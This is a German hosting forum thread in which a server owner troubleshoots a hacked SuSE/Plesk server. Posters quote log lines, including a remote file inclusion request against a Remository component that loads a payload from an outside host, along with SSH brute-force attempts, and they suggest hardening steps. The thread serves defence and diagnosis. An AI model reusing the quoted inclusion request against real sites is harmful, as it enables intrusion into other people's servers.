Server gehackt

[charli]

Hallo,

"für Profis" bedeutet, daß Du ein nacktes Betriebssystem erhälst ohne Administrationshilfe bei dem Du auch noch einiges zu tun hast bis es richtig läuft.

Zu berücksichtigen ist, dass das Linux so einfach zu bedienen ist, wie SuSe 9.0

Debian ist nicht schwieriger, aber in einigen Punkten anders. Da Du mit Suse Erfahrung hast würde ich dabei bleiben. Alle "für Profis" und Nicht-Suse fallen wohl weg. Alle Suse vor 9.3 fallen auch weg, weil es bis 9.1 keine Yast-Updates mehr gibt und für 9.2 bald auch nicht mehr.

Und schon bleibt nicht mehr viel übrig.

SUSE 10.0 OSS inkl. Plesk 8.0
SUSE 9.3 Professional inkl. Plesk 7.5

Plesk ist deutlich anders aufgebaut als Confixx, bietet aber AFAIK die Möglichkeit Confixx-Daten zu übernehmen. Plesk greift noch tiefer in's System ein als Confixx, es ist schwieriger spezielle Einrichtungen so vorzunehmen daß diese von Plesk toleriert werden. Andererseits ist Plesk groß im Kommen, auf dem besten Weg die Bedeutung zu bekommen die Confixx hat(te). Da Plesk viel eingesetzt wird ist auch die Chance groß, HowTos und Hilfe im Netz zun finden.

Die Plesk-Lizenzen erlauben nur eine bestimmte Anzahl von Domains (das war bei Confixx nicht so), die kleinste Lizenz AFAIK 30 Domains. Wenn Du viele Domains hast vorher bei Strato nachsehen wie viele Domains die Lizenz die Du bekommst verwalten kann und ob man (später) ggf. auf eine höhere Lizenz aufrüsten kann.

Mehr kann ich zu Plesk nicht sagen, es ist mir noch unsympatischer als Confixx. Wenn Plesk, würde ich gleich die neuere Version Plesk 8.0 auf Suse 10.0 nehmen.

SUSE 9.3 Professional inkl. ServerAdmin 24

ServerAdmin24 ist AFAIK nichts anderes als eine neuere Version von Visas. War auf meinem Strato-Server vorinstalliert, ich habe es vor der Entsorgung kurz ausprobiert und fand es viel schwächer als Confixx.

Es gibt auch Freeware-Administrationshilfen (Syscp, VHSC) die man auf eine "für Profis"-Installation selbst aufspielt. Etliches an Arbeit bis es läuft, dafür hat man dann eine Administrationshilfe von der der Quellcode frei zur Verfügung steht und keine albernen Beschränkungen wie "max. 30 Domains".

 

[nukem]

Ich habe in der Logfile folgenden Eintrag gefunden:
85.25.132.134 - - [11/Aug/2006:08:20:15 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ehmorgan.net/morgan.dat? HTTP/1.1" 200 16384 "-" "libwww-perl/5.803"

Dieser Eintrag in deiner vhost.conf hätte dir wahrscheinlich diesen ärger erspart:

 php_admin_value open_basedir "/var/www/:/tmp/:/usr/share/php/"

@Deathangel: Was sagen denn deine Mail Logs? Ist ein derartig verdächtirger Eintrag vorhanden?

 

[Back-Up]

Danke für den Hinweis. Ich hatte dies in meiner confixx_vhost.conf:

php_admin_value open_basedir /srv/www/htdocs/web0/html/:/srv/www/htdocs/web0/phptmp/:/srv/www/htdocs/web0/files/:/srv/www/htdocs/web0/atd/

Ist das in dieser Form problematisch?


Ist davon auszugehen, dass der Hacker das root-Passwort kennt? Übrigens habe ich eine index.htm und eine main.pl (Trojanisches Pferd) auf meinem Server gefunden, die der Hacker angelegt hatte.

 

[Back-Up]

Hallo,

und wieder wurde mein Server laut Berichten von Besuchern heute morgen sehr langsam.
Ein Ausschnitt aus der Logile (/var/log/messages):

Aug 20 06:16:01 h652308 sshd[29775]: Authentication started for user root
Aug 20 06:16:01 h652308 sshd[29775]: Plesk DB connection established successfully
Aug 20 06:16:01 h652308 sshd[29775]: Querying SELECT password, type FROM psa.accounts as a, psa.sys_users AS s WHERE a.id = s.account_id AND s.login='root'
Aug 20 06:16:01 h652308 sshd[29775]: No user 'root' found
Aug 20 06:16:04 h652308 sshd[29769]: error: PAM: Authentication failure for root from r220-101-3-243.cpe.unwired.net.au
Aug 20 06:17:17 h652308 sshd[29790]: Invalid user adelbert from 80.81.252.246
Aug 20 06:17:18 h652308 sshd[29794]: Invalid user adrian from 80.81.252.246
Aug 20 06:17:18 h652308 sshd[29798]: Invalid user albert from 80.81.252.246
Aug 20 06:17:18 h652308 sshd[29802]: Invalid user albrecht from 80.81.252.246
Aug 20 06:17:19 h652308 sshd[29806]: Invalid user alexander from 80.81.252.246
Aug 20 06:17:20 h652308 sshd[29810]: Invalid user alfred from 80.81.252.246
Aug 20 06:17:20 h652308 sshd[29814]: Invalid user ali from 80.81.252.246
Aug 20 06:17:21 h652308 sshd[29818]: Invalid user andreas from 80.81.252.246
Aug 20 06:17:21 h652308 sshd[29822]: Invalid user anton from 80.81.252.246
Aug 20 06:17:22 h652308 sshd[29826]: Invalid user arnim from 80.81.252.246
Aug 20 06:17:22 h652308 sshd[29830]: Invalid user arno from 80.81.252.246
Aug 20 06:17:22 h652308 sshd[29834]: Invalid user august from 80.81.252.246
Aug 20 06:17:23 h652308 sshd[29838]: Invalid user axel from 80.81.252.246

...und dann folgen hunderte, wenn nicht tausende weiterer solcher Zeilen mit immer neuem user Namen. Das zieht sich etwa eine halbe Stunde lang hin. Der Server soll jedoch gegen 10:10 Uhr so langsam gewesen sein...

Was tun? Kann das die Ursache für den Performanceeinfall sein? Kann man das verhindern? Kann ich diese IP sperren?

Habe das bei Google gefunden: IP 80.81.252.252



Weiterhin habe ich über Seiten diese Fehlermeldungen in der error_log von apache2:

[Sun Aug 20 10:55:25 2006] [warn] child process 2135 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2136 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2139 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2141 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2144 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2145 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2146 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2148 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2149 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2151 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2155 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2159 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2162 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2168 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2170 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2174 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2179 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2180 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2183 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2188 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2190 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2191 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2193 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2194 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2198 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2199 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2200 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2201 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2206 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2207 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2210 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2213 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2214 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2216 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2219 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2224 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2226 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2229 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2230 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2232 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2233 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:25 2006] [warn] child process 2240 still did not exit, sending a SIGTERM


Bei mir läuft übrigens SuSe 10.0 mit PLESK 8.0.1 (was für ein Schrott! ).

 

[Back-Up]

Aussagekräftiger ist vielleicht dieser Ausschnitt:

[Sun Aug 20 10:48:25 2006] [error] child process 15059 still did not exit, sending a SIGKILL
[Sun Aug 20 10:48:25 2006] [error] child process 13806 still did not exit, sending a SIGKILL
[Sun Aug 20 10:48:25 2006] [error] child process 15139 still did not exit, sending a SIGKILL
[Sun Aug 20 10:48:25 2006] [error] child process 27594 still did not exit, sending a SIGKILL
[Sun Aug 20 10:48:25 2006] [error] child process 12804 still did not exit, sending a SIGKILL
[Sun Aug 20 10:48:25 2006] [error] child process 25586 still did not exit, sending a SIGKILL
[Sun Aug 20 10:48:25 2006] [error] child process 24345 still did not exit, sending a SIGKILL
[Sun Aug 20 10:48:25 2006] [error] child process 13639 still did not exit, sending a SIGKILL
[Sun Aug 20 10:48:25 2006] [error] child process 13198 still did not exit, sending a SIGKILL
[Sun Aug 20 10:48:25 2006] [error] child process 13221 still did not exit, sending a SIGKILL
[Sun Aug 20 10:48:25 2006] [error] child process 13226 still did not exit, sending a SIGKILL
[Sun Aug 20 10:48:25 2006] [error] child process 13228 still did not exit, sending a SIGKILL
[Sun Aug 20 10:48:25 2006] [error] child process 26852 still did not exit, sending a SIGKILL
[Sun Aug 20 10:48:25 2006] [error] child process 28731 still did not exit, sending a SIGKILL
[Sun Aug 20 10:48:25 2006] [error] child process 28733 still did not exit, sending a SIGKILL
[Sun Aug 20 10:48:26 2006] [notice] caught SIGTERM, shutting down
[Sun Aug 20 10:48:28 2006] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
[Sun Aug 20 10:48:28 2006] [warn] RSA server certificate CommonName (CN) `h652308.serverkompetenz.net' does NOT match server name!?
[Sun Aug 20 10:48:28 2006] [warn] RSA server certificate CommonName (CN) `h652308.serverkompetenz.net' does NOT match server name!?
No worker file and no worker options in httpd.conf \nuse JkWorkerFile to set workers\n
[Sun Aug 20 10:48:28 2006] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
[Sun Aug 20 10:48:28 2006] [warn] RSA server certificate CommonName (CN) `h652308.serverkompetenz.net' does NOT match server name!?
[Sun Aug 20 10:48:28 2006] [warn] RSA server certificate CommonName (CN) `h652308.serverkompetenz.net' does NOT match server name!?
No worker file and no worker options in httpd.conf \nuse JkWorkerFile to set workers\n
[Sun Aug 20 10:48:29 2006] [notice] mod_python: Creating 32 session mutexes based on 512 max processes and 0 max threads.
[Sun Aug 20 10:48:29 2006] [notice] Apache/2.0.54 (Linux/SUSE) configured -- resuming normal operations
[Sun Aug 20 10:49:56 2006] [error] server reached MaxClients setting, consider raising the MaxClients setting
[Sun Aug 20 10:55:19 2006] [warn] child process 1209 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:19 2006] [warn] child process 1210 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:19 2006] [warn] child process 1211 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:19 2006] [warn] child process 1212 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:19 2006] [warn] child process 1213 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:19 2006] [warn] child process 1217 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:19 2006] [warn] child process 1218 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:19 2006] [warn] child process 1219 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:19 2006] [warn] child process 1220 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:19 2006] [warn] child process 1221 still did not exit, sending a SIGTERM
[Sun Aug 20 10:55:19 2006] [warn] child process 1222 still did not exit, sending a SIGTERM

 

[marneus]

[Sun Aug 20 10:48:28 2006] [warn] RSA server certificate CommonName (CN) `h652308.serverkompetenz.net' does NOT match server name!?

Diese Fehlermeldung lag bei mir daran, dass das falsche CERT in der httpd.conf eingetragen war.

Hast Du evtl. ein Komplettbackup von Plesk eingespielt? Dann musst du die httpd.conf noch entsprechend anpassen. (bzw. die entsprechende Include Datei).

Die Meldungen mit den unbekannten Usern kommen von Skriptkiddies, die nach einem Account auf Deinem Server mit Bruteforceattacken suchen für späteren Zugriff. SSH Port verlegen, und Ruhe ist.

 

[Back-Up]

CERT sagt mir nicht. Kannst du mir das genauer erklären?

Ich habe kein Backup eingespielt. PLESK wurde erst vor kurzem vom Provider installiert und von mir über den PLESK Administrationsbereich geupdatet.
Wie sieht eine entsprechende Anpassung in der httpd.conf aus?

Wie verlege ich den SHH Port?


Du siehst, du hast es mit einem Anfänger zu tun .


Ist das CERT Problem oder die Bruteforceattacke für den Performanceeinbruch verantwortlich?

 

[Sinepp]

[error] server reached MaxClients setting, consider raising the MaxClients setting

In der httpd.conf gibt es eine Einstellung dafür, schau mal nach was die sagt. Wieviel Leute kommen so auf die HP?

SSH Port verlegen: /etc/ssh/sshd_conf oder so ähnlich und dort den Port verlegen, anschließend /etc/init.d/sshd restart

Ansonsten dafür mal im Board suchen, das ist oft diskutiert worden.

 

[Back-Up]

Es kommen täglich 1000 Besucher. Online sind immer so um die 30-50.

Ich habe die MaxClients schon auf 512 gestellt.


Weiß man denn nun was die Ursache für den extremen Performanceeinbruch der Webseite ist?
Was ist mit den vielen vielen [Sun Aug 20 10:XX:XX 2006] [warn] child process XXXX still did not exit, sending a SIGTERM ?

 

[Thorsten]

Hallo!
In diesem Thread sind nun reichlich Themen durcheinander gewürfelt worden. Eventuell ist es sinvoller, jeweils einen neuen Beitrag pro Thema zu erstellen.

mfG
Thorsten